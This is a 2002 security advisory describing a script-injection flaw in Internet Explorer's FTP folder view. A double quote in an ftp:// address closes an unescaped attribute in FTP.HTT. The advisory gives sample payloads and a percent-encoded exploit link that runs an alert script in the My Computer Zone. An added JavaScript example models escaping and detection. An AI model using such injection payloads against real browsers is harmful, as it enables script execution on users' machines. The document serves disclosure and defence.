Title:

Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution Vulnerability

Date:

7 June 2002 (Last modified: )

Author:

Eiji James Yoshida [zaddik@geocities.co.jp]
penetration technique research site [Advisories]

Risk:

Medium

Vulnerable:

Windows2000 SP2 IE5.5SP1
Windows2000 SP2 IE5.5SP2
Windows2000 SP2 IE6.0

Bugtraq ID:

4954

Patch:

Windows2000 SP3 (Q316890)
* This article is currently not available.

Overview:

IE allows malicious scripts to run because of a bug in the 'Folder view for FTP sites' feature.

If both the 'Enable folder view for FTP sites' IE Advanced Setting
and the 'Enable Web content in folders' Explorer Folder Option are enabled,
a script embedded in the FTP server address will run.
(Both options are set to 'Enable' by default.)

 * Importantly, the script runs in the My Computer Zone!

 

Details:

The problem is in FTP.HTT invoked by the 'folder view for FTP sites' feature.
( %SystemRoot%\WEB\FTP.HTT )

--------------------FTP.HTT--------------------
35:    <BASE href="%THISDIRPATH%\">
-----------------------------------------------

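'%THISDIRPATH%' is inserted into the href attribute without being escaped,
so a double quote in the FTP server address closes the attribute and the
text that follows it is parsed as HTML (see Example 2).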

(Example 1)
[ ftp://TARGET ]
    '%THISDIRPATH%' = 'ftp://TARGET/'
    <BASE href="ftp://TARGET/\">

(Example 2)
[ ftp://"><script>alert("Exploit");</script> ]
    '%THISDIRPATH%' = 'ftp://"><script>alert("Exploit");</script>/'
    <BASE href="ftp://"><script>alert("Exploit");</script>/\">
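
The substitution described above, modeled as an added example (not code from the advisory or from Microsoft): TEMPLATE is the FTP.HTT line quoted above, and all function names are hypothetical. It shows the raw expansion beside an attribute-escaped one, plus a conservative check for FTP links whose authority decodes to markup characters.

```javascript
// Added example: models the %THISDIRPATH% substitution on line 35 of FTP.HTT.
// TEMPLATE is the line quoted in the advisory; all function names are hypothetical.
const TEMPLATE = '<BASE href="%THISDIRPATH%\\">';

// Behaviour the advisory describes: the value is substituted as-is.
function expandUnescaped(dirPath) {
  return TEMPLATE.replace('%THISDIRPATH%', () => dirPath);
}

// HTML-attribute escaping, so the value cannot close href="..." or open a tag.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeAttr(value) {
  return value.replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Hardened form: escape first, then substitute.
function expandEscaped(dirPath) {
  return TEMPLATE.replace('%THISDIRPATH%', () => escapeAttr(dirPath));
}

// Conservative filter for links (mail gateway, proxy, HTML sanitizer):
// flag ftp:// URLs whose authority, once percent-decoded, contains quotes,
// angle brackets, whitespace or control characters.
function ftpAuthorityIsSuspicious(url) {
  const m = /^ftp:\/\/([^\/?#]*)/i.exec(url.trim());
  if (!m) return false; // not an FTP URL
  let authority;
  try {
    authority = decodeURIComponent(m[1]);
  } catch (e) {
    return true; // malformed percent-escapes
  }
  return /["'<>\s\x00-\x1f\x7f]/.test(authority);
}

// Inputs taken from the advisory's Example 1, Example 2 and "Exploit code".
const EXAMPLE_1 = 'ftp://TARGET/';
const EXAMPLE_2 = 'ftp://"><script>alert("Exploit");</script>/';
const ADVISORY_LINK = 'ftp://%22%3e%3cscript%3ealert(%22Exploit%22)%3b%3c%2fscript%3e%20';

console.log(expandUnescaped(EXAMPLE_1)); // benign address, attribute stays intact
console.log(expandUnescaped(EXAMPLE_2)); // attribute closed early, markup follows
console.log(expandEscaped(EXAMPLE_2));   // value stays inside href="..."
console.log(ftpAuthorityIsSuspicious(ADVISORY_LINK));
```
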

 

Exploit code:

<a href="ftp://%22%3e%3cscript%3ealert(%22Exploit%22)%3b%3c%2fscript%3e%20" target="_blank">Exploit</a>

Demonstration:

Exploit_1 [screen shot]
Exploit_2 [screen shot]

Workaround:

Disable either the 'Enable folder view for FTP sites' IE Advanced Setting
or the 'Enable Web content in folders' Explorer Folder Option.

Vendor status:

Microsoft was notified on 21 December 2001.

Similar vulnerabilities:

Mozilla FTP View Cross-Site Scripting Vulnerability

Opera FTP View Cross-Site Scripting Vulnerability

 Copyright(c) 2002 Eiji James Yoshida. All rights reserved